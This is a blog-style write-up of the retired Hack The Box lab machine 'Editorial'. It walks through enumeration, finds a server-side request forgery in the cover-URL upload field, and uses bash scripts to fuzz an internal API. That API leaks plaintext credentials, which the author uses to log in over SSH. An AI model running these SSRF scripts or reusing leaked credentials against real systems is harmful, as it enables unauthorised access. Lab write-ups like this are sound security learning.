HTB Editorial - An Adventure
A detailed writeup of the Hack The Box machine Editorial.
Nate
Reading Time: 25 Minutes, 53 Seconds
2025-04-25
In this adventure, we’ll be taking a look at the retired Hack The Box machine, “Editorial.”
I call this an adventure rather than a walkthrough because I don’t want it to be a clean, step-by-step guide without missteps. Instead, I want it to be raw—capturing my real thought process, mistakes, failures, and discoveries. I believe this authenticity is often missing from cybersecurity write-ups, making them unnecessarily intimidating, especially for beginners. The struggle and making mistakes are how we all learn.
If you’re looking for a clean-cut, step-by-step guide, this isn’t it. I’m sure there are plenty out there. However, in an effort to build my own skills and provide an authentic learning experience, I haven’t looked at any of them.
Let’s get started!
Diving in & Enumeration
Initial Nmap Scan
After spawning the box we’re presented with a single IP address: 10.10.11.20.
Let’s start things off with an initial Nmap TCP scan of the provided IP address. Since non-standard ports are common in these challenges, I opted to scan all ports with -p-.
nmap -sC -sV -p- -oN editorial-scan 10.10.11.20
# Nmap 7.95 scan initiated Tue Apr 22 17:20:04 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -p- -oN editorial-scan 10.10.11.20
Nmap scan report for 10.10.11.20
Host is up (0.079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_ 256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 22 17:20:55 2025 -- 1 IP address (1 host up) scanned in 51.62 seconds
Nmap returns only 2 open TCP ports, 80 and 22. I also ran a UDP scan, but it returned no open ports.
Since we don’t have any SSH credentials at the moment, let’s take a look at the web server running on port 80.
Visiting the webserver
Navigating to http://10.10.11.20:80 immediately redirects you to http://editorial.htb/, so let’s add that to our /etc/hosts file.
echo "10.10.11.20 editorial.htb" | sudo tee -a /etc/hosts
After adding the domain to our hosts file and refreshing the page, we arrive at ‘Editorial Tiempo Arriba’, which—according to (always accurate) Google Translate —means ‘Editorial Time Up’ I’m guessing it actually translates to something along the lines of “Up Time Publishing”.
Home Page:
After looking around the page, it appears that both the search bar and subscription box are not functional. In addition, only the “About” and “Publish with us” links work.
About page:
The “About” page doesn’t appear to be much, but we’ll take note of the email address “[email protected]” at the bottom of the page and add tiempoarriba.htb to our /etc/hosts file and move on.
echo "10.10.11.20 tiempoarriba.htb" | sudo tee -a /etc/hosts
Visiting the “Publish with us” page reveals something much more interesting and, hopefully, vulnerable—an upload form!
Before we dive into this form, let’s finish our initial enumeration and discovery by enumerating directories, subdomains, and v-hosts with Ffuf.
Directory, Subdomain, and V-Host Enumeration With Ffuf
I started by enumerating directories for editorial.htb. I had to step away for a moment, so I chose a bigger list than usual to start with and just let it run.
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://editorial.htb/FUZZ -c -t 20 -o editorial-subdirs
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://editorial.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 20
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
about [Status: 200, Size: 2939, Words: 492, Lines: 72, Duration: 87ms]
upload [Status: 200, Size: 7140, Words: 1952, Lines: 210, Duration: 80ms]
It looks like the items discovered were the two pages we already know about.
I also tried subdomain and vhost enumeration with different lists from Seclists, but didn’t find anything.
I then repeated the same process for tiempoarriba.htb. It turned out to be pretty boring and appears to contain no subdomains, vhosts, or directories of its own. From what I can tell, its sole function is to redirect to editorial.htb.
Let’s take a deeper look at the upload form.
Upload Form Exploration & Attempted Exploitation
Admittedly, I was excited and got ahead of myself here, immediately trying to upload a PHP reverse shell via the file selector, as well as the “Cover URL” function via a python http server on my attack box. That didn’t work.
Taking a step back, and taking a look at Wappalyzer (not a sponsor) shows us that editorial.htb is running Hugo, a static site generator. This means there’s no PHP to exploit.
Let’s take a look at the page’s source code next.
Source Code Analysis
Taking a look at the source code reveals a point of interest:
<script>
document.getElementById('button-cover').addEventListener('click', function(e) {
e.preventDefault();
var formData = new FormData(document.getElementById('form-cover'));
var xhr = new XMLHttpRequest();
xhr.open('POST', '/upload-cover');
xhr.onload = function() {
if (xhr.status === 200) {
var imgUrl = xhr.responseText;
console.log(imgUrl);
document.getElementById('bookcover').src = imgUrl;
document.getElementById('bookfile').value = '';
document.getElementById('bookurl').value = '';
}
};
xhr.send(formData);
});
</script>
The above script sends a POST request to /upload-cover which returns a string. This string is then used as the file name for the linked and/or attached file when the form is submitted. It then outputs the uploaded file path to the console. It also resets the “bookfile” and “bookurl” values.
Something I found interesting is that the script only calls for a string to set the file name once, but uploads both files. It’s not immediately clear how the server would handle receiving both a linked file and directly uploaded file in the same request. Perhaps this is something we can investigate later.
Testing File Upload
I uploaded a random file to test the upload function. We received a URL back in the console and the form was cleared, as expected.
When visiting the URL provided by the console, the file is immediately downloaded rather than rendered on the page. Directory listing is also not enabled for the /static or /static/uploads directory. Unfortunately, this file upload doesn’t seem like a viable attack method.
Testing Cover URL Requests
Let’s test the cover upload via HTTP:
First, we’ll start a python server on our attack box.
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
I then created a test.txt file in my current directory and submitted it via the “Cover URL” box.
Upon submission, we can see that the request was successful and that the target was able to retrieve our test file.
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.20 - - [23/Apr/2025 19:56:41] "GET /test.txt HTTP/1.1" 200 -
Unfortunately, this file is also re-named when it is uploaded.
Navigating to the file’s URL results in the same behavior of the file immediately downloading, rather than being rendered in the page.
I then tried bash command injection via attachment file names and image URL by modifying the POST request in ZAProxy, in case the renaming was handled by bash in an insecure manner. Unfortunately, this did not work.
Is Uploading Two Files At Once Handled Differently?
Since the form only returns one string to rename the files, It made me wonder how uploading two files at once is handled.
Let’s try uploading two images of Clippy to see which one is displayed in the preview, and if we get two strings back in the console.
It appears that clippy1.jpg (URL upload) was displayed and took priority over clippy2.jpeg (attachment upload).
We also received only one URL back in the console.
Taking a look at the web request body, we can see that the image URL is provided before the attachment, which makes sense because it is the first element of the form. My initial theory is that the server uses the first item provided to it, be it the URL or attached file, and discards the second item, if present.
-----------------------------134243872140118328451478405779
Content-Disposition: form-data; name="bookurl"
http://10.10.14.13:8000/clippy1.jpg
-----------------------------134243872140118328451478405779
Content-Disposition: form-data; name="bookfile"; filename="clippy2.jpeg"
Content-Type: image/jpeg
ÿØÿà JFIF ÿÛ
<SNIP>
Searching For Exploits
It seems I’ve hit a bit of a dead end with the upload form. With no other interesting pages or obvious paths forward, I’m running out of options to explore. At this point, I decided to pivot toward researching potential exploits. Using the versions identified by Wappalyzer, I searched for known exploits for the detected versions of Nginx and Hugo through Searchsploit and Google.
Unfortunately, I was unable to find any exploits that we could take advantage of in our current situation.
It’s okay to ask for help!
At this point, I was fresh out of ideas on how to continue and admittedly, a bit frustrated. If this were a real would scenario, it would be time to ask for help and bounce ideas off a coworker. However, since this is Hack The Box we can’t do that. Instead, let’s take a look at the next relevant hint in “Guided mode”. To do so, we have to answer the questions up to our current point in this simulated assessment.
This brings us to “Task 4” in “Guided mode”:
What TCP port is serving another webserver listening only on localhost?
Very interesting! I didn’t think to use the image URL upload feature on the upload form to scan for an internal web server.
Using The Image URL Upload Feature To Scan For An Internal Web Server
We can accomplish this by sending the /upload-cover post request to the fuzzer in ZAProxy.
Once we have the request open in the fuzzer, we can change the URL in the request body to http://127.0.0.1:1.
We’ll then highlight the port number and add it as a fuzz location. Since we’re only fuzzing for open ports, we’ll use the “Numberzz” payload and set it to fuzz for 1-5000 in increments of one and start the fuzzer.
After the fuzzer completes and upon reviewing the responses, it looks like we have quite a few responses with a body of “/static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg” and a body size of 61 bytes. It appears the server returns this image if there is an error while retrieving the URL provided in our request.
Let’s sort by “Size Resp. Body” to see if there are any different responses.
We have a hit at port 5000—right at the very end of our fuzzing range! What a lucky hit for an arbitrary set of ports I decided to start with!
Port 5000 seems to have returned data which the form’s upload script then renamed before providing us with a URL.
Let’s take a look at the URL we were provided!
That’s… disappointing. My suspicion is that the server on port 5000 returned an HTTP 200 - OK response but didn’t actually return any data. This likely resulted in the upload form providing us a URL that points to nothing, since no data was saved — which is why we’re on this wonderful page.
The good news is, we have another web server to enumerate!
Internal Web Server Enumeration
We’ll repeat the same method we used above to discover the internal web server with ZAProxy, but this time we’ll enumerate content by targeting http://127.0.0.1:5000/FUZZ, using two lists from SecLists: directory-list-2.3-medium.txt and api-endpoints-res.txt.
This resulted in 232,880 requests, each with a response body size of 51 bytes and a URL within the body. It’s probably safe to assume that the webserver on port 5000 returns HTTP 200 for any request sent to it. To figure out if any of these URLs actually contain data, we’ll need to extract them and place them in a list to query. That way, we can see which of them, if any, return data.
By the way, don’t try to persist your ZAP session after you’ve performed fuzzing unless you really want to clear your fuzzing history and wait for it to complete again. (╯ರ ~ ರ)╯︵ ┻━┻
Though, there is something to be said for starting with smaller fuzzing lists.
Unfortunately, ZAProxy doesn’t have a native way to export the response bodies as a list. However, we can export our fuzzing data as a .HAR and use grep to extract the URLs we need from the response body.
Remember what I just said about starting with smaller fuzzing lists? Apparently, ZAP doesn’t like exporting ~200K requests at once as a .HAR file. It doesn’t complain, but the resulting file is 0 bytes. So I re-fuzzed with directory-list-2.3-small.txt and api-endpoints-res.txt. I was then able to export the ~100K requests as a .HAR
To do so, we’ll need a regular expression. I’m not that great at building regular expressions, so we’ll use Regex Generator (https://regex-generator.olafneumann.org).
After pasting a sample URL and specifying the UUID as the interesting pattern for the RegEx, we’re presented with the following RegEx:
^static/uploads/[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}$
RegEx Generatior even provides us with a pre-written grep command!
grep -P -i 'static/uploads/[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}' [FILE...]
We’ll add -o to the command to clean up the output so it’s only text that matches our Regex, with each match on a new line. Let’s also redirect the output to a new file so we have a saved list to fuzz with.
grep -P -i -o 'static/uploads/[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}' localhost-5000-fuzz.har > localhost5000-url-list
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ wc -l localhost5000-url-list
99985 localhost5000-url-list
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ head localhost5000-url-list
static/uploads/4afe3780-06cd-4fbc-8c69-a63ec58dfdea
static/uploads/7a700c97-87e8-4f5e-9c47-048bc8d65ca8
static/uploads/1362a2af-79d3-4abc-bba5-dea65bf4a119
static/uploads/b0e003f5-1cc7-43c4-b4a6-d2be0bddf4da
static/uploads/fbf6ec84-6884-4f7b-a9a0-16960d7e2d5c
static/uploads/987abd72-46fc-4eab-8910-1cbc5e9b5b8b
static/uploads/e3ef3490-21d8-4f14-a134-247ff7fcb9c0
static/uploads/421abc85-c6c3-4c1c-84f8-61f0e1529f25
static/uploads/62f8d9fa-3007-45d0-8de0-1a1e9f5d93bf
static/uploads/2fdb1696-7fc4-4c1a-b862-e0863a341e47
Now that we have a list of URLs extracted from the response body, we can start checking to see if any of them return content instead of a 404.
To check if any of these URLs return content, we’ll go back to Ffuf.
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ ffuf -w localhost5000-url-list:FUZZ -u http://editorial.htb/FUZZ -t 50
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://editorial.htb/FUZZ
:: Wordlist : FUZZ: /home/kali/HTB/editorial/localhost5000-url-list
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [99985/99985] :: Job [1/1] :: 628 req/sec :: Duration: [0:02:41] :: Errors: 0 ::
That’s interesting, nothing matched any of the above response codes Ffuf looks for by default. I would expect something from the lists we used to return data. Let’s match all response codes to see what Ffuf is getting back.
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ ffuf -w localhost5000-url-list:FUZZ -u http://editorial.htb/FUZZ -t 50 -mc all
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://editorial.htb/FUZZ
:: Wordlist : FUZZ: /home/kali/HTB/editorial/localhost5000-url-list
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: all
________________________________________________
static/uploads/987abd72-46fc-4eab-8910-1cbc5e9b5b8b [Status: 404, Size: 207, Words: 27, Lines: 6, Duration: 83ms]
static/uploads/62f8d9fa-3007-45d0-8de0-1a1e9f5d93bf [Status: 404, Size: 207, Words: 27, Lines: 6, Duration: 83ms]
static/uploads/4afe3780-06cd-4fbc-8c69-a63ec58dfdea [Status: 404, Size: 207, Words: 27, Lines: 6, Duration: 83ms]
static/uploads/2fdb1696-7fc4-4c1a-b862-e0863a341e47 [Status: 404, Size: 207, Words: 27, Lines: 6, Duration: 86ms]
static/uploads/fada359a-94a8-43db-8974-925f8a287cdb [Status: 404, Size: 207, Words: 27, Lines: 6, Duration: 86ms]
It looks like we’re getting back 404 for every page. Just for a sanity check, lets grab test.txt from our attack box via a python web server and a manual request sent through ZAP, then try to visit the URL in firefox.
We can see above that a URL was returned in the response body, and checking the HTTP server on our attack box shows the file was retrieved.
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.20 - - [24/Apr/2025 19:00:54] "GET /test.txt HTTP/1.1" 200 -
When we visit the URL in Firefox, we immediately receive a file.
But when I tried to visit the URL again after a few minutes, I got an error 404. Are these files deleted after they are accessed? Are they moved after a set time?
Next, I performed a very scientific test: I re-submitted the request in ZAP and received a new URL. Then I began counting from the moment I submitted the request with Curl. I curled every 10 seconds until I got a 404.
┌──(kali㉿kali)-[~]
└─$ curl http://editorial.htb/static/uploads/3d1d6e36-f5dc-4a29-8694-245b99c0180f
this is a test
┌──(kali㉿kali)-[~]
└─$ curl http://editorial.htb/static/uploads/3d1d6e36-f5dc-4a29-8694-245b99c0180f
this is a test
<SNIP>
┌──(kali㉿kali)-[~]
└─$ curl http://editorial.htb/static/uploads/3d1d6e36-f5dc-4a29-8694-245b99c0180f
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
I did this multiple times, and each time I received a 404 after ~60 seconds. This proves that the file is not deleted after it is accessed. It also makes a strong case that the files are moved or deleted after ~60 seconds. You might be thinking I could have wrote a script to do this… You’re probably right.
So this means we have a roughly 60 second window from when the request is submitted to retrieve the data generated by the request. To take advantage of this, we’ll have to write a script that submits the fuzz request then immediately tries to retrieve the URL we get back.
#!/bin/bash
#Set fuzz list file to import and use
fuzzlist="FUZZFILEHERE"
#Loop to read each item from the fuzz list
while read fuzzitem; do
echo "Submitting - $fuzzitem"
#For each item in the list, send a POST request containing the item from the fuzz list, which should return a partial URL from the response body. We'll also wrap curl in a variable so we can retrieve the output.
response=$(curl -s -X POST http://editorial.htb/upload-cover \
-H "Host: editorial.htb" \
-H "User-Agent: Mozilla/5.0" \
-H "Accept: */*" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Content-Type: multipart/form-data; boundary=---------------------------367237918129785721433957227571" \
-H "Origin: https://editorial.htb" \
-H "Connection: keep-alive" \
-H "Referer: https://editorial.htb/upload" \
-H "Sec-Fetch-Dest: empty" \
-H "Sec-Fetch-Mode: cors" \
-H "Sec-Fetch-Site: same-origin" \
--data-binary @- <<EOF
-----------------------------367237918129785721433957227571
Content-Disposition: form-data; name="bookurl"
http://127.0.0.1:5000/$fuzzitem
-----------------------------367237918129785721433957227571
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream
-----------------------------367237918129785721433957227571--
EOF
)
#Next, we'll extract the partial URL from the response body using our previously generated regex.
partialurl=$(echo "$response" | grep -oE 'static/uploads/[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}')
#If we actually get a partial URL back, we'll combine it with our base URL and pass it to WGET to save the content to look through after the script completes.
if [[ -n "$partialurl" ]]; then
fullurl="http://editorial.htb/$partialurl"
echo "Requesting - $fullurl"
wget -q "$fullurl"
else
echo "No RegEx match in response"
fi
#Tell bash where to read the data from
done < "$fuzzlist"
This took a while to make and probably isn’t the most efficient way to accomplish this, but I need all the practice with bash scripts that I can get. For the sake of simplicity, and only running this once, we’ll combine the 2 lists we want to use into one file and save it in the folder with our bash script.
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ wc -l /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt && wc -l /usr/share/wordlists/seclists/Discovery/Web-Content/api/api-endpoints-res.txt
87650 /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
12334 /usr/share/wordlists/seclists/Discovery/Web-Content/api/api-endpoints-res.txt
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ cat /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt /usr/share/seclists/Discovery/Web-Content/api/api-endpoints-res.txt > combinedlist.txt
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ wc -l combinedlist.txt
99984 combinedlist.txt
The line count of combinedlist.txt indicates that combining our two lists was successful. I then changed the input file in the script and ran it.
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ ./fuzz-and-request.sh
Submitting - index
Requesting - http://editorial.htb/static/uploads/34495a50-f4fb-43ab-b69e-50a9d3d5798d
Submitting - images
Requesting - http://editorial.htb/static/uploads/af2393f9-3cae-41b7-adc7-f90ea518f07a
Submitting - download
Requesting - http://editorial.htb/static/uploads/e7f45b7b-33ed-485a-b339-777b583956ff
Submitting - 2006
Requesting - http://editorial.htb/static/uploads/b6ae9e64-8784-447f-b9be-dfa8d225c505
Submitting - news
Requesting - http://editorial.htb/static/uploads/a7e6b182-42d9-4ff4-b2b0-8327455cbedd
….aaaaand it’s painfully slow. We’re going to be here for hours to days waiting for this to finish. If we want to get through this, we’re either going to need to use smaller lists or speed up the script. I’m going with the latter for the sake of learning. So much for simplicity! :)
A quick google search, (and a good bit of trial and error) shows us that we can modify the script to run with GNU parallel. Which has awesome man pages, by the way.
Here’s the updated script:
#!/bin/bash
#Removed the for loop and made fuzzitem the first arg passed to the script to make the script compatible with parallel
fuzzitem="$1"
#Print what we're requesting
echo "Submitting - $fuzzitem"
#Send a POST request containing the item from the fuzz list, which should return a partial URL from the response body. We'll also wrap curl in a variable so we can retrieve the output.
response=$(curl -s -X POST http://editorial.htb/upload-cover \
-H "Host: editorial.htb" \
-H "User-Agent: Mozilla/5.0" \
-H "Accept: */*" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Content-Type: multipart/form-data; boundary=---------------------------367237918129785721433957227571" \
-H "Origin: https://editorial.htb" \
-H "Connection: keep-alive" \
-H "Referer: https://editorial.htb/upload" \
-H "Sec-Fetch-Dest: empty" \
-H "Sec-Fetch-Mode: cors" \
-H "Sec-Fetch-Site: same-origin" \
--data-binary @- <<EOF
-----------------------------367237918129785721433957227571
Content-Disposition: form-data; name="bookurl"
http://127.0.0.1:5000/$fuzzitem
-----------------------------367237918129785721433957227571
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream
-----------------------------367237918129785721433957227571--
EOF
)
#Next, we'll extract the partial URL from the response body using our previously generated regex.
partialurl=$(echo "$response" | grep -oE 'static/uploads/[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}')
#If we actually get a partial URL back, we'll combine it with our base URL and pass it to WGET to save the content to look through after the script completes.
if [[ -n "$partialurl" ]]; then
fullurl="http://editorial.htb/$partialurl"
echo "Requesting - $fullurl"
wget -q "$fullurl"
else
echo "No RegEx match in response"
fi
Now we have to run the script with parallel, like so:
parallel -j 0 ./parallel-fuzznrequest.sh {} :::: combinedlist.txt
Setting jobs to 0 allows us to run as many jobs as our CPU can handle, since we’re trying to get this done as fast as we can.
One unfortunate thing about this implementation is that I’m going to end up with ~100k files in my folder. A bit of an oversight for sure. But hey, were here to learn and break things. We’ll handle the output more gracefully next time.
The script took ~20 minutes to run and we now have an unreasonable amount of files in the folder we ran the script in.
<SNIP>
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 413bd009-b98b-4617-bbcd-074e8cf8e1e6
-rw-rw-r-- 1 kali kali 207 Apr 24 23:13 413cb2b8-cacd-4353-843a-886d48c0c18a
-rw-rw-r-- 1 kali kali 207 Apr 24 23:22 413d049a-18c0-424f-bf87-36d7980565bb
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 413d884e-01d4-41bd-9bee-c82624111c66
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 413e6eed-b297-4461-a76c-c5947dd43735
-rw-rw-r-- 1 kali kali 207 Apr 24 23:19 413e9783-83ab-4e4e-af16-82cca8024d1e
-rw-rw-r-- 1 kali kali 207 Apr 24 23:23 413ec3aa-2bd3-439a-a29a-a94f92e664be
-rw-rw-r-- 1 kali kali 207 Apr 24 23:19 413fb5cf-01d5-4ffb-b15d-3d3d33377faa
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 4140b258-7967-4914-9a82-a3ddb12272ec
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 41416bc4-7400-463b-a51f-4ce033afe6cd
-rw-rw-r-- 1 kali kali 207 Apr 24 23:19 41421891-9ac4-4622-b617-74087d0fd1dd
-rw-rw-r-- 1 kali kali 207 Apr 24 23:13 414219e9-906f-45a9-bf8e-64e1bf3fa9a4
-rw-rw-r-- 1 kali kali 207 Apr 24 23:22 41428d77-523f-4324-b69d-d34bf900ccbe
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 4143351a-e649-4da0-abba-57926c0af0e1
-rw-rw-r-- 1 kali kali 207 Apr 24 23:14 41444f79-a132-4d6f-8813-9900151169ea
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 414648df-853a-40ce-a3ff-2f0a65d628f8
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 4147c1ca-eae9-4fb7-b019-0c83e20b8cbb
-rw-rw-r-- 1 kali kali 207 Apr 24 23:16 4148a549-d526-46a0-8c40-c28246b83198
-rw-rw-r-- 1 kali kali 207 Apr 24 2025 4148bc58-6657-4c6b-ba1e-1605fb22d14a
-rw-rw-r-- 1 kali kali 207 Apr 24 23:18 414b6f6a-d3ea-46c6-b92c-797fd240e78d
-rw-rw-r-- 1 kali kali 207 Apr 24 23:21 414bd0c2-4ad4-4cd1-875e-becdf62e59f7
<SNIP>
It seems that the majority of files here are 207 bytes. We can use find and rm to remove files matching exactly 207 bytes and tell us what it deleted.
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ find . -type f -size 207c -exec rm -v {} \;
removed './02a38ce9-f890-4fe1-9c19-b24650dcf322'
removed './4c8b12fb-0dc5-403f-ba4c-2fd34521378b'
removed './4947f15d-e777-4381-a5ee-b1f53fb3b901'
removed './973901da-ebc0-4036-b35a-28daa525fa98'
removed './963f84fc-3c9b-45bf-b1cc-645660c5f971'
<SNIP>
Now we’re left with 5 files. That worked out better than I thought it would!
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ ls
2560287a-94fc-4493-9f97-3a8b4d83e035 312af474-10ed-4c2b-b9d9-e5a060522d96 889448e2-bab7-42c2-bd5f-f28e130cfa1a df876560-b73c-4dc5-88ac-7e783bf30d58 ef254d2b-f900-46c5-9eb9-1dd88bc21e46
I started by using cat *
to quickly check the file contents. It looks to be JSON, but some of it repeats. Instead of manually comparing the files to see if the contents are duplicate, let’s use md5sum.
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ md5sum *
b97108fe4a69d0067fc30b9708c73a8f 312af474-10ed-4c2b-b9d9-e5a060522d96
b97108fe4a69d0067fc30b9708c73a8f 889448e2-bab7-42c2-bd5f-f28e130cfa1a
b97108fe4a69d0067fc30b9708c73a8f 2560287a-94fc-4493-9f97-3a8b4d83e035
b97108fe4a69d0067fc30b9708c73a8f df876560-b73c-4dc5-88ac-7e783bf30d58
b97108fe4a69d0067fc30b9708c73a8f ef254d2b-f900-46c5-9eb9-1dd88bc21e46
It looks like all the file hashes are the same.
We’ll take the a file in the list and pipe it to jq to view the contents in a readable format.
{
"messages": [
{
"promotions": {
"description": "Retrieve a list of all the promotions in our library.",
"endpoint": "/api/latest/metadata/messages/promos",
"methods": "GET"
}
},
{
"coupons": {
"description": "Retrieve the list of coupons to use in our library.",
"endpoint": "/api/latest/metadata/messages/coupons",
"methods": "GET"
}
},
{
"new_authors": {
"description": "Retrieve the welcome message sended to our new authors.",
"endpoint": "/api/latest/metadata/messages/authors",
"methods": "GET"
}
},
{
"platform_use": {
"description": "Retrieve examples of how to use the platform.",
"endpoint": "/api/latest/metadata/messages/how_to_use_platform",
"methods": "GET"
}
}
],
"version": [
{
"changelog": {
"description": "Retrieve a list of all the versions and updates of the api.",
"endpoint": "/api/latest/metadata/changelog",
"methods": "GET"
}
},
{
"latest": {
"description": "Retrieve the last version of api.",
"endpoint": "/api/latest/metadata",
"methods": "GET"
}
}
]
}
Finally, progress! We’re presented with a list of API endpoints and a description on how to use them.
API Enumeration
Let’s make a list of the valid api endpoints and send them back through our script.
api/latest/metadata/messages/promos
api/latest/metadata/messages/coupons
api/latest/metadata/messages/authors
api/latest/metadata/messages/how_to_use_platform
api/latest/metadata
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ parallel -j 2 ./parallel-fuzznrequest.sh {} :::: apiendpointlist.txt
Submitting - api/latest/metadata/messages/promos
Requesting - http://editorial.htb/static/uploads/d5c39e43-ebf9-47cf-8c2e-683274a34ffd
Submitting - api/latest/metadata/messages/coupons
Requesting - http://editorial.htb/static/uploads/3dd1cacc-9e38-4ab6-91e3-a8f9dea9bf3a
Submitting - api/latest/metadata/messages/authors
Requesting - http://editorial.htb/static/uploads/b6dc3015-f311-438f-8dda-199f6771885d
Submitting - api/latest/metadata/messages/how_to_use_platform
Requesting - http://editorial.htb/static/uploads/f9498522-5f21-4d8f-ae2d-01340d1202af
Submitting - api/latest/metadata
Requesting - http://editorial.htb/static/uploads/25d25b41-4fa9-462e-9eb9-b16bc934155d
Upon reviewing the files, it looks like 2 endpoints returned data. A couple promo codes and a set of credentials!
[{"2anniversaryTWOandFOURread4":{"contact_email_2":"[email protected]","valid_until":"12/02/2024"}},{"frEsh11bookS230":{"contact_email_2":"[email protected]","valid_until":"31/11/2023"}}]
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
We now have the credentials dev:dev080217_devAPI!@
. Everyone changes their password when you ask them to… right?
Initial OS Foothold & Enumeration
Nope.
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ ssh [email protected]
<SNIP>
dev@editorial:~$
Since there isn’t a login page on the site I’m aware of, I immediately tried SSH and was successful.
